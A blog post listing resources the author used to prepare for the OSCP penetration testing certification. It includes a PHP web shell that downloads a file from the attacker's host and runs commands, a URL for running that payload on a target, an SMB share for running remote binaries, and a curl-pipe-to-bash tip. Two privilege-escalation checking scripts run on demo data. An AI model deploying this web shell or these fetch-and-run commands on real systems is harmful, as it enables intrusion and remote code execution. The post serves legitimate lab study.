Zero to OSCP: Concise Edition

Daniel Houghton
Oct 1 · 11 min read

Introduction

September 1st 2018: I made the commitment to become an Offensive Security Certified Professional as fast as I could, with just the foundations of a ‘B’ in A level computing gained 14 years prior and my drive to forge a career in cyber security.

August 1st 2019: I passed the OSCP exam.

If I were to collate a list of every article, cheatsheet, walkthrough, video, and forum post I utilised before, during and after the Penetration Testing with Kali Linux course, not only would it be exponentially longer, it would be unreadable and, more importantly, unusable. It is paramount to realise that alongside the items below there were countless hours of troubleshooting and triage on my path to the OSCP certification, which I knew would be the case when I committed to the process. By this logic, with some direction, it is perfectly feasible that other people with zero experience could (and probably have) become an OSCP much faster than I did.

Below is a roughly chronological and concise list of the stand out tools and resources outside of the PWK course material that helped me get from zero to OSCP in under 12 months.

PWK Preparation

‘Penetration Testing with Kali Linux is a foundational course, but still requires students to have certain knowledge prior to attending the online class. A solid understanding of TCP/IP, networking, and reasonable Linux skills are required. Familiarity with Bash scripting along with basic Perl or Python is considered a plus.’ — Offensive Security

It goes without saying that you should go over the PWK course syllabus start to finish. At the very least, you’ll start to recognise the names of tools and protocols you will need to familiarise yourself with and know to pay attention when you encounter them in the resources below.

Linux Journey — It’s no understatement to say that the first time I sat behind a keyboard at a Linux terminal I didn’t know my ‘ls’ from my ‘rm -rf /’. This has everything you need to get started and more. Moving around the file system and ‘grep’ing for things will get boring quickly and you’ll want to move on fast, but Linux Journey is a great resource to come back to.

  • Heavier reading? Yes. But you should at the very least skim the Kali Linux Revealed book. It’s free — no excuses.

Cybrary Cisco CCNA — This free, 15.6 hour set of video lectures from Cybrary goes into depth on the OSI model. Not only did this course improve my understanding of networking, but it bridged a lot of gaps in my existing knowledge. Some of the information might be a little superfluous to the OSCP, but it is all good knowledge. I found watching it at 1.25x speed made it a little easier to digest.

  • I also watched their course on ‘Penetration Testing and Ethical Hacking’; while it was nice to get an overview of some of the tools mentioned in the PWK syllabus, the scope was not as deep as the Cisco CCNA course.

Overthewire Bandit — The ‘bandit’ wargame, at the time, felt like my first real step into ‘hacking’. It starts off simple and scales brilliantly, giving you suggested commands and reading material to help you find what you need to access the next level. It’s not especially broad in scope, but it’s fun and it helps cement beginner Linux commands into memory. There are a ton of walkthroughs out there, so refer to them for nudges and hints. (Note, which applies to every resource from here on: if you use a guide or a walkthrough, it is essential that you work backwards from the answer to the point where you got stuck. Make your own notes. Don’t move past it until you understand what is happening.)

  • A particular highlight was writing my first shell script on level 23. shellscript.sh helped me with this a great deal.
  • The ‘Natas’ wargame is more web focused and also a lot of fun. Unfortunately, I didn’t manage to complete it first time round before getting to a stage where I felt like I was out of my depth and leaning too heavily on guides, particularly for scripting. Writing this reminds me, I should go back and finish it.

Codecademy — I had very little prior coding experience and realised that having at least some basic scripting knowledge before jumping into the PWK course material would make my life a lot easier. I completed the Python and JavaScript modules on Codecademy, taking advantage of the fact that at the time I registered they were also offering a week’s free trial of their Pro subscription by burning through the modules as quickly as possible.

Metasploit Unleashed — More content direct from Offensive Security; the ‘Metasploit Unleashed — Free Ethical Hacking Course’ was recommended to me by a friend that started me on the road to OSCP (shout out to Ruby Nealon: @_ruby). While Metasploit usage is restricted in the exam, it’s not restricted in the labs. Offensive Security even encourage you to experiment with it in the lab environment. It’s fun to root boxes in 30 seconds with meterpreter — try it out.

Vulnhub — Vulnhub is a fantastic way to practise hacking Linux machines. At the bottom of each machine’s page is a list of walkthroughs. Even after owning machines, I would read through a few write ups from different users to analyze and compare their methodologies and picked up a few tools along the way. Vulnhub was the first time I properly observed the ‘boot to root’ hacking process from start to finish.

Shellter Labs — The ‘Getting Started’ section on Shellter eases you in gently, but ramps the difficulty up fast. The stand out module for me was ‘The Art of Reverse Engineering’ as it introduces assembly language and the dreaded ‘buffer overflow’. Love them or hate them, they’re part of the course and you need to be able to do them. Offensive Security do a great job of explaining the process to the standard they require, but if you want to get ahead of the game, these two resources helped me wrap my head around what’s happening in a buffer overflow attack:

PWK Course

I’ve included a few bonus ‘quality of life’ tools and resources in this section that, whilst not necessarily essential, improved my workflow by reducing the number of headaches I suffered.

Google — Undoubtedly the most used resource throughout the duration of the course (“countless hours of troubleshooting and triage”). In 2019, if you have a question, Google/YouTube will have the answer (don’t forget to make sure you understand the answer before moving on), or, at the very least, someone can point you on the path to figuring it out. Learn to use your search engine of choice well — it’s all practice for OSINT gathering.

Offensive Security Student Forums — If you go to the OS student forums looking for help on a machine you will likely find a minefield of cryptic hints, some leading to the solution but most leading you to confusion and rabbit holes. They can be great if you’ve done your enumeration properly and have an idea of the correct vector — therefore do your best to resist the urge to jump onto the forum for help until you have exhausted all the options on your list after several rounds of enumeration. A question I found myself asking early on was ‘Where do I get started in the labs?’; when faced with that question now, I give the following answer:

  • Find g0tmilk’s guide to a lab machine on the student forums.
  • Read it.
  • Read it again.
  • Read between the lines. (hint: methodology)
  • Read it and hack along.
  • Go over your notes, try the next machine along and then move onto whatever other low hanging fruit you can find.

OSCP Subreddit — Another great community for those approaching or working through their OSCP and veterans alike. Combine this with the official OS student forums to learn what makes a good question and what makes a bad question. Ask good questions, get good answers.

Reconnoitre — Reconnoitre takes one step towards automating your enumeration, but still keeps you ‘involved’ by suggesting commands for you to run against the scanned target instead of doing everything for you. This gives you the opportunity to get a better understanding of (and tweak) the syntax of each command.

highon.coffee Reverse Shell Cheatsheet — Is this all the reverse shells you’re going to need for the labs? No. Is it most of them? Probably.

Nishang — The Nishang repository of PowerShell scripts is another great resource for shells; I got extensive use out of Invoke-PowerShellTcp.

Netsec TTY Shell guide — Who hasn’t accidentally ‘ctrl+c’d out of a shell before? Once you have spawned a tty shell on the target (for example via Python’s pty module), background it with ‘ctrl+z’, run ‘stty raw -echo’ in your local terminal, bring the shell back with ‘fg’ and press enter twice. Not only will you no longer be accidentally terminating shells, but you’ll also gain tab autocomplete and arrow keys. Two extra steps make it usable for editors and pagers: set TERM (‘export TERM=xterm’) and match the size with ‘stty rows <n> cols <m>’ to your local terminal. If the shell dies while your terminal is in raw mode, run ‘reset’ locally to get your echo back.

ropnop File Transfer guide — ropnop has a great guide on transferring files to Windows targets. Working with Windows targets got a whole lot easier once I learned you could host binaries in Kali over SMB with Impacket’s smbserver.py and execute them directly from the target machine via a UNC path. Try the following out in the labs (chain it with a php cmd shell for fun and profit):

  • Kali: smbserver.py a .  (share name ‘a’ serving the current directory; add -smb2support for targets that refuse SMB1, and -username/-password if the target won’t allow anonymous access)
  • Windows: \\your.kali.ip.here\a\evil.exe

Sente php backdoor — Sente on github has a simple php backdoor one liner that I used extensively throughout the labs.

  • I can’t remember which of his vast array of videos I found it in, but Ippsec (more on this guy a little later) showcased a great php command shell that lets you upload and execute files hosted over http on your Kali box with style and ease:

<?php
// This script lives on the TARGET web server. 'fupload' fetches a file of the
// given name from the attacker's (Kali) web server and writes it next to this
// script under the same name, so the web root must be writable by the web
// server user. 'fexec' runs a command on the target and returns its output.
if (isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("http://your.kali.ip.here/" . $_REQUEST['fupload']));
}
if (isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
}
?>

  • Because the script runs on the target, the request goes to the target’s web server, while the file it fetches comes from your Kali box. It can then be called with syntax similar to the following:

http://target.ip.here/shell.php?fupload=evil.exe&fexec=evil.exe

  • On a Linux target the equivalent is fupload=evil.elf&fexec=chmod +x evil.elf; ./evil.elf (URL-encode the spaces and separators if your browser doesn’t do it for you). Both requests use $_REQUEST, so the parameters work in the query string or a POST body.
  • Dissecting and understanding what this small php script is doing would be a good first step into the sort of thing you can expect to come across regularly in the PWK labs.

g0tmilk’s guide to Linux privilege escalation — The go-to for manual privilege escalation in Linux. It takes time to understand what each command is doing and what is considered a ‘normal’ output, but it is undoubtedly time well spent.

  • It is worth noting that automated privilege escalation scripts can save a lot of time, but they don’t always find everything.
  • LinEnum.sh checks for common misconfigurations in Linux and produces a lot of output, but if you learn to parse it quickly it can be a great first step for privesc. Throw it at the box and see if anything jumps out (protip: host it on your Kali box with your web server of choice, then on your target use curl to fetch the script and pipe it to bash for a smaller footprint on your target; wget with output to stdout does the same job on boxes without curl). Save the output to a file rather than scrolling through it in a fragile reverse shell.
  • linuxprivchecker.py does a similar job, but requires python on the target machine. It also suggests potential privilege escalation exploits for you to try based on the target configuration and present applications — prone to producing false positives, but I have had some success with its suggestions.
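To make the phrase ‘checks for common misconfigurations’ concrete, here is an added example, my own code and not LinEnum.sh or linuxprivchecker.py, that implements two of the checks those scripts run: setuid/setgid binaries (flagging the ones a GTFOBins-style list says are abusable) and world-writable sensitive files. It runs against a constructed throwaway directory tree so it works anywhere; the ABUSABLE_IF_SUID list is an assumed subset, not a complete one.

```python
"""Two LinEnum-style privilege escalation checks, written out in Python.
Added example: not code from LinEnum, linuxprivchecker.py or the PWK course."""
import os
import stat
import tempfile

# Assumed subset of binaries that give an easy root when setuid (see GTFOBins
# for the full list). A setuid 'passwd' is normal; a setuid 'find' is a finding.
ABUSABLE_IF_SUID = {"find", "vim", "nmap", "bash", "python", "perl", "cp", "env", "awk"}


def suid_sgid_files(root):
    """Return [(path, 'suid'|'sgid', abusable)] for regular files under root.

    This is the 'find / -perm -4000' check from LinEnum, minus the noise.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; the shell scripts skip it too
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID:
                hits.append((path, "suid", name in ABUSABLE_IF_SUID))
            elif st.st_mode & stat.S_ISGID:
                hits.append((path, "sgid", False))
    return sorted(hits)


def world_writable(paths):
    """Return the subset of paths that exist and carry the o+w bit.

    Run it over /etc/passwd, /etc/shadow, /etc/crontab and every directory in
    root's PATH: a writable file there is usually a one-step root.
    """
    out = []
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            continue
        if st.st_mode & stat.S_IWOTH:
            out.append(p)
    return out


def report(root):
    """Summarise both checks by basename, the way you'd eyeball LinEnum output."""
    suid = suid_sgid_files(root)
    sensitive = [os.path.join(root, "etc", f) for f in ("passwd", "shadow", "crontab")]
    return {
        "abusable_suid": sorted(os.path.basename(p) for p, b, a in suid if b == "suid" and a),
        "other_suid": sorted(os.path.basename(p) for p, b, a in suid if b == "suid" and not a),
        "sgid": sorted(os.path.basename(p) for p, b, a in suid if b == "sgid"),
        "world_writable": sorted(os.path.basename(p) for p in world_writable(sensitive)),
    }


def build_demo_tree():
    """Construct a throwaway tree that mimics a misconfigured box (demo data only)."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    bin_dir = os.path.join(root, "usr", "bin")
    etc_dir = os.path.join(root, "etc")
    os.makedirs(bin_dir)
    os.makedirs(etc_dir)
    # find: setuid and abusable; passwd: setuid but expected; ls: normal; wall: setgid
    for name, mode in (("find", 0o4755), ("passwd", 0o4755), ("ls", 0o755), ("wall", 0o2755)):
        p = os.path.join(bin_dir, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, mode)
    # /etc/passwd world-writable (bad), /etc/shadow locked down (fine)
    for name, mode in (("passwd", 0o666), ("shadow", 0o640)):
        p = os.path.join(etc_dir, name)
        with open(p, "w") as fh:
            fh.write("root:x:0:0::/root:/bin/bash\n")
        os.chmod(p, mode)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for key, names in report(demo_root).items():
        print(f"{key:15} {', '.join(names) or '-'}")
```

Point suid_sgid_files at ‘/’ and world_writable at the real /etc paths on a lab box to run the checks for real; the value of writing them out is seeing that ‘setuid’ on its own is not a finding (passwd is supposed to be setuid) and that the script only lists candidates, which you still have to verify by hand.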

Fuzzysecurity’s guide to Windows privilege escalation — The go-to for manual privilege escalation in Windows. Same again — spend a bit of time trying out the commands on various flavours of Windows and comparing what you get back.

  • windows-exploit-suggester.py is a great tool that takes a text file dump of the ‘systeminfo’ command output and returns public exploits and Metasploit modules that could lead to elevation of privileges. Run it with --update first to fetch the Microsoft security bulletin spreadsheet it compares against, then pass that file with --database alongside your dump with --systeminfo. It produces a lot of false positives (a missing KB may have been superseded by a later rollup that ‘systeminfo’ doesn’t list), but I’ve gotten lucky a few times by working through its suggestions.
  • wes.py (wesng) is the ‘next generation’ of Windows exploit suggester that works much like its unofficial predecessor, but has better support for Windows Vista and later. You can also pass flags to filter the results down to privilege escalation vulnerabilities with known public exploits.
  • jaws-enum.ps1, or Just Another Windows (Enum) Script, is another PowerShell script that allows users to quickly identify privilege escalation vectors. Again, quite verbose in output, but learn to parse it quickly and see what jumps out.
  • PowerUp.ps1 is a PowerShell script that checks for ‘common Windows privilege escalation vectors that rely on misconfigurations’. It’s not a catch-all by any means, but I’ve had success using it.
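The core of what windows-exploit-suggester.py and wes.py do is a join between the ‘systeminfo’ dump and a bulletin table, and seeing it written out shows exactly where the false positives come from. The following is an added example of my own, not the code of either tool: it parses a constructed ‘systeminfo’ sample for OS version, architecture and installed KBs, then filters a three-row stand-in for the bulletin database. The KB-to-bulletin mappings in the table are from memory and are assumptions to verify against the tool’s real database.

```python
"""Minimal exploit-suggester logic. Added example; not windows-exploit-suggester.py or wes.py."""
import re

# Constructed sample of `systeminfo` output, trimmed to the fields that matter.
SAMPLE_SYSTEMINFO = """\
Host Name:                 LAB-WIN7
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB3139914
"""

# Constructed stand-in for the bulletin database (the real tools load thousands
# of rows). 'affects' holds major.minor OS versions; KB numbers are assumed.
BULLETINS = [
    {"id": "MS16-032", "kb": "KB3139914", "affects": {"6.1", "6.2", "6.3"},
     "arch": {"x86", "x64"}, "impact": "Elevation of Privilege"},
    {"id": "MS15-051", "kb": "KB3045171", "affects": {"6.0", "6.1", "6.2", "6.3"},
     "arch": {"x86", "x64"}, "impact": "Elevation of Privilege"},
    {"id": "MS10-015", "kb": "KB977165", "affects": {"5.1", "5.2", "6.0", "6.1"},
     "arch": {"x86"}, "impact": "Elevation of Privilege"},
]


def parse_systeminfo(text):
    """Extract OS major.minor, architecture and the set of listed hotfix KBs."""
    info = {"version": None, "arch": None, "hotfixes": set()}
    for line in text.splitlines():
        m = re.match(r"OS Version:\s+(\d+)\.(\d+)\.", line)
        if m:
            info["version"] = f"{m.group(1)}.{m.group(2)}"
            continue
        m = re.match(r"System Type:\s+(x86|x64)-based", line, re.IGNORECASE)
        if m:
            info["arch"] = m.group(1).lower()
            continue
        m = re.search(r"\[\d+\]:\s*(KB\d+)", line, re.IGNORECASE)
        if m:
            info["hotfixes"].add(m.group(1).upper())
    return info


def suggest(text, bulletins=BULLETINS, impact=None):
    """Return bulletin ids whose fix is not listed as installed on this host.

    A bulletin is suggested when the OS version and architecture are affected
    and its KB is absent from the hotfix list. That last test is the weak link:
    `systeminfo` only shows what WMI knows about, and a later cumulative update
    can have closed the hole without the named KB ever appearing, which is why
    these tools are prone to false positives.
    """
    info = parse_systeminfo(text)
    hits = []
    for b in bulletins:
        if impact and b["impact"] != impact:
            continue
        if info["version"] not in b["affects"] or info["arch"] not in b["arch"]:
            continue
        if b["kb"] in info["hotfixes"]:
            continue
        hits.append(b["id"])
    return hits


if __name__ == "__main__":
    host = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"host: {host['version']} {host['arch']}, {len(host['hotfixes'])} hotfixes")
    print("candidates:", suggest(SAMPLE_SYSTEMINFO, impact="Elevation of Privilege"))
```

On the sample, MS16-032 is dropped because its KB is listed, MS10-015 is dropped because the host is x64, and MS15-051 remains as a candidate. Flip the sample to ‘X86-based PC’ and MS10-015 reappears, which is the same filtering the real tools expose through their architecture and impact options.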

SecWiki Windows Kernel Exploits — SecWiki hosts a load of precompiled Windows exploit binaries. Always take care when running binaries you haven’t compiled yourself: read the accompanying source, and where a source file is available prefer to build it yourself rather than trusting the prebuilt executable.

OSCP Exam

I am purposefully avoiding being overly verbose in my discussion of the OSCP exam for obvious reasons. If you’ve worked through the course materials and labs, checked out the resources in this article and have strong Google-Fu, you should be sufficiently equipped to pass.

Offensive Security OSCP Exam Guide — Read this and read it again. Pay specific attention to the submission instructions and proof.txt screenshot formats, and don’t forget to submit your proof.txt keys into the exam panel. I’ve read horror stories of people acing the exam machines but failing because of a mistake in the report submission process.

Hack the Box — I scheduled my exam for after my lab time had ended and in the interim I spent my time in the Hack the Box labs working through their ‘OSCP-like’ boxes (@TJ_Null curated a list of such machines here). Pay for the VIP access and you’ll get access to a lower population lab environment and their retired machines, for which walkthroughs are permitted; as with the Vulnhub VMs you can then refer to the guides when you hit a wall. They also have a number of Windows boxes and I found myself learning a lot on these.

Ippsec’s Hack the Box Walkthroughs — Ippsec makes video walkthroughs of the retired Hack the Box machines. He’s a fantastic teacher and does an excellent job of explaining his approach. Something I particularly appreciate is that he leaves the film rolling when things don’t go to plan so you get to watch his troubleshooting process. Even if it’s not a machine that you are currently tackling or even have any intention of working on, watch his videos while you eat your breakfast/take a break/wind down after a day at work and you are guaranteed to learn something.

nmapAutomator — No automated enumeration script will catch everything, but with time management being a key factor to success in the OSCP exam, it’s great to have something you can run in the background while you work on something else. This is exactly what nmapAutomator.sh from 21y4d is brilliant for. You can then parse the output and extend your enumeration as necessary. Try not to lean on this as a crutch and only use it when you feel comfortable with enumerating manually.

Summary

As stated in the introduction, the aforementioned resources were curated to be as ‘time spent:knowledge gained’ efficient as possible — with hindsight, I would attribute my success in the PWK course and OSCP exam to this foundation, paired with the TryHarder® mentality and my passion for cyber security. If you have a similar drive and build on this foundation, you’ll get your OSCP.

This writeup will be partnered with an ‘Extended Edition’ which covers my thoughts and experiences in a little more depth. Coming Soon…

Verify my OSCP status with Acclaim
